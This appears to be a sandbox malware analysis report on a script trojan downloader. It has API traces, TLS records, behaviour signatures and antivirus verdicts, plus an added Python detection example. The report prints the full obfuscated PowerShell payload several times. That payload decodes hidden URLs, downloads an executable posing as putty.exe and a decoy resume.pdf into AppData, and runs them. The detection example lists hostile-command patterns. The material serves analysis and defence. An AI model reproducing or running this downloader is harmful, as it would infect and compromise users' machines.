$WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
cmdline powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
filepath: powershell.exe
1 1 0
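The ShellExecuteExW record above is the point where a browser process hands control to PowerShell. Because the sandbox stored the sample as 1.hta.html, the parent here is iexplore.exe rather than mshta.exe, which is what a real double-click on a .hta would show; a detection should cover both parents. The Python below is an added triage example, not part of the ZeroBOX report: it scores process-creation events on the parent/child pairing plus command-line heuristics taken from the features visible in this report's command line (an ExecutionPolicy override, a `[char]($n-$key)` decode loop, long integer-array literals, a WebClient download and a write-to-%AppData%-then-run sequence). The event field names, the weights and the threshold are the example's own assumptions, and three of the four events are constructed; the first carries an abridged excerpt of the report's command line.

```python
"""Process-creation triage for the browser/HTA-host -> PowerShell chain in this
report (added example; heuristics, weights and event format are assumptions).
"""
from __future__ import annotations

import re

# Parents that should not normally spawn a shell: browsers and the HTA host.
SCRIPT_HOST_PARENTS = {"iexplore.exe", "mshta.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# (name, regex over the child's command line); each match adds one point.
CMDLINE_HEURISTICS = [
    ("execution-policy-override",
     re.compile(r"-e(?:x\w*|p)\s+(?:unrestricted|bypass)", re.I)),
    ("char-offset-decode",                       # [char]($n-$key) loops
     re.compile(r"\[char\]\(\s*\$\w+\s*[-+]\s*\$?\w+\s*\)", re.I)),
    ("integer-array-literal",                    # @(58046,58049,...) with >= 9 numbers
     re.compile(r"@\((?:\s*\d{4,6}\s*,){8,}")),
    ("webclient-download",
     re.compile(r"Net\.WebClient|\.Download(?:Data|File|String)\(", re.I)),
    ("drop-to-appdata-and-run",                  # %AppData% path, then a launch verb
     re.compile(r"\$env:AppData.*?(?:Start-Process|Invoke-Item|rundll32)", re.I | re.S)),
]
CHAIN_WEIGHT = 3      # a browser/HTA parent alone is enough to alert
ALERT_THRESHOLD = 3

# Abridged excerpt of the command line in the process tree: only the statements
# the heuristics look at are kept, and their order is compressed.
REPORT_CMDLINE = (
    "powershell.exe -ExecutionPolicy UnRestricted "
    "function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;"
    "foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};"
    "function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\\';"
    "$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));"
    "$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);"
    "Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $xOAHReFL;"
    "Invoke-Item $CzIiUhxSTLAUdkft;}XMHJopzpJ;"
)

# Constructed process-creation events (field names are this example's assumption).
EVENTS = [
    {"parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",      # from this report
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": REPORT_CMDLINE},
    {"parent_image": r"C:\Windows\explorer.exe",                              # constructed, benign
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe",                              # constructed, noisy admin use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File .\deploy.ps1"},
    {"parent_image": r"C:\Windows\System32\mshta.exe",                        # constructed, real .hta parent
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> dict:
    """Score one event; 'alert' is True when the score reaches the threshold."""
    parent, child = _basename(event["parent_image"]), _basename(event["image"])
    chain = parent in SCRIPT_HOST_PARENTS and child in SHELLS
    hits = [name for name, rx in CMDLINE_HEURISTICS if rx.search(event["command_line"])]
    score = (CHAIN_WEIGHT if chain else 0) + len(hits)
    return {"parent": parent, "child": child, "suspicious_chain": chain,
            "cmdline_hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


if __name__ == "__main__":
    for ev in EVENTS:
        r = triage(ev)
        print(f"{r['parent']} -> {r['child']}: score={r['score']} alert={r['alert']} hits={r['cmdline_hits']}")
```

The weighting reflects the report: the parent/child pairing alone reaches the threshold, so the mshta.exe case alerts even with an encoded command the regexes cannot see, while a policy override typed from an interactive shell stays below it. Tune the parent set and weights to the environment before deploying anything like this.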
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff80000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received / Data sent: raw TLS records of the HTTPS connections (binary payload, not reproducible as text). Fields recoverable from the dump:
  ClientHello SNI: the.earth.li (two connections), transfer.sh (one connection)
  ServerHello random ends with the "DOWNGRD" sentinel (a TLS 1.3-capable server negotiating a lower version, RFC 8446 section 4.1.3)
  Certificate chain presented for transfer.sh:
    CN=transfer.sh, issuer C=US, O=Let's Encrypt, CN=R3, validity 230814194251Z to 231112194250Z (2023-08-14 to 2023-11-12), OCSP http://r3.o.lencr.org, caIssuers http://r3.i.lencr.org/
    R3, issuer C=US, O=Internet Security Research Group, CN=ISRG Root X1, validity 200904000000Z to 250915160000Z, caIssuers http://x1.i.lencr.org/, CRL http://x1.c.lencr.org/
    ISRG Root X1 (cross-signed), issuer O=Digital Signature Trust Co., CN=DST Root CA X3, validity 210120191403Z to 240930181403Z, caIssuers http://apps.identrust.com/roots/dstrootcax3.p7c, CRL http://crl.identrust.com/DSTROOTCAX3CRL.crl, CPS http://cps.root-x1.letsencrypt.org
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
Status 1 Return 1 Repeated 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR 
@(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Time & API Arguments Status Return Repeated

send

buffer: (binary TLS data; contains server name the.earth.li)
socket: 1272
sent: 116
Status 1 Return 116 Repeated 0

send

buffer: (binary TLS data; contains server name the.earth.li)
socket: 1272
sent: 116
Status 1 Return 116 Repeated 0

send

buffer: (binary TLS data; contains server name transfer.sh)
socket: 1000
sent: 115
Status 1 Return 115 Repeated 0

send

buffer: (binary TLS data; not reproducible as text)
socket: 1000
sent: 134
Status 1 Return 134 Repeated 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1796
0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\putty.exe
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR 
@(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LiGvHIOT($txOWRyeIebeb, $oLpNFYWdIfVI){[IO.File]::WriteAllBytes($txOWRyeIebeb, $oLpNFYWdIfVI)};function FwSFiiFSYVTVTHXIL($txOWRyeIebeb){if($txOWRyeIebeb.EndsWith((uOOYYDAttqilkKNbGR @(57978,58032,58040,58040))) -eq $True){Start-Process (uOOYYDAttqilkKNbGR @(58046,58049,58042,58032,58040,58040,57983,57982,57978,58033,58052,58033)) $txOWRyeIebeb}else{Start-Process $txOWRyeIebeb}};function VfYawVMDSrUtxA($OSNQHjhsSMprXg){$oLFtNqCcnUSsMU = New-Object (uOOYYDAttqilkKNbGR @(58010,58033,58048,57978,58019,58033,58030,57999,58040,58037,58033,58042,58048));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$oLpNFYWdIfVI = $oLFtNqCcnUSsMU.DownloadData($OSNQHjhsSMprXg);return $oLpNFYWdIfVI};function uOOYYDAttqilkKNbGR($lIYzshXR){$wxUWk=57932;$cNLkEyfPHma=$Null;foreach($gHylftyO in $lIYzshXR){$cNLkEyfPHma+=[char]($gHylftyO-$wxUWk)};return $cNLkEyfPHma};function XMHJopzpJ(){$WOIZqGZPbjNthFdWxT = $env:AppData + '\';$xOAHReFL = $WOIZqGZPbjNthFdWxT + 'putty.exe'; if (Test-Path -Path $xOAHReFL){FwSFiiFSYVTVTHXIL $xOAHReFL;}Else{ $BUorXeLMEEUr = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR @(58036,58048,58048,58044,58047,57990,57979,57979,58048,58036,58033,57978,58033,58029,58046,58048,58036,57978,58040,58037,57979,58058,58047,58035,58048,58029,58048,58036,58029,58041,57979,58044,58049,58048,58048,58053,57979,58040,58029,58048,58033,58047,58048,57979,58051,57986,57984,57979,58044,58049,58048,58048,58053,57978,58033,58052,58033));LiGvHIOT $xOAHReFL $BUorXeLMEEUr;FwSFiiFSYVTVTHXIL $xOAHReFL;};$CzIiUhxSTLAUdkft = $WOIZqGZPbjNthFdWxT + 'resume.pdf';If(Test-Path -Path $CzIiUhxSTLAUdkft){Invoke-Item $CzIiUhxSTLAUdkft;}Else{ $KNkswdkLPiuMkJRrQhZq = VfYawVMDSrUtxA (uOOYYDAttqilkKNbGR 
@(58036,58048,58048,58044,58047,57990,57979,57979,58048,58046,58029,58042,58047,58034,58033,58046,57978,58047,58036,57979,58035,58033,58048,57979,57999,58037,58033,57989,58052,57988,57979,58046,58033,58047,58049,58041,58033,57978,58044,58032,58034));LiGvHIOT $CzIiUhxSTLAUdkft $KNkswdkLPiuMkJRrQhZq;Invoke-Item $CzIiUhxSTLAUdkft;};;;;}XMHJopzpJ;
Process injection Process 2620 resumed a thread in remote process 2708
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000358
suspend_count: 1
process_identifier: 2708
Status 1 Return 0 Repeated 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.Script.Generic.4!c
FireEye VB:Trojan.Valyria.6828
ALYac VB:Trojan.Valyria.6828
VIPRE VB:Trojan.Valyria.6828
Sangfor Malware.Generic-VBS.Save.d3bc8d82
Arcabit VB:Trojan.Valyria.D1AAC
Cyren VBS/Agent.APP!Eldorado
ESET-NOD32 VBS/TrojanDownloader.Agent.XAO
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.6828
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.6828
Tencent Vbs.Trojan-Downloader.Der.Ocnw
Emsisoft VB:Trojan.Valyria.6828 (B)
F-Secure Malware.VBS/Dldr.Agent.VPJK
Jiangmin Trojan.Script.amhb
Avira VBS/Dldr.Agent.VPJK
GData VB:Trojan.Valyria.6828
Google Detected
MAX malware (ai score=86)
Fortinet VBS/Agent.UQJ!tr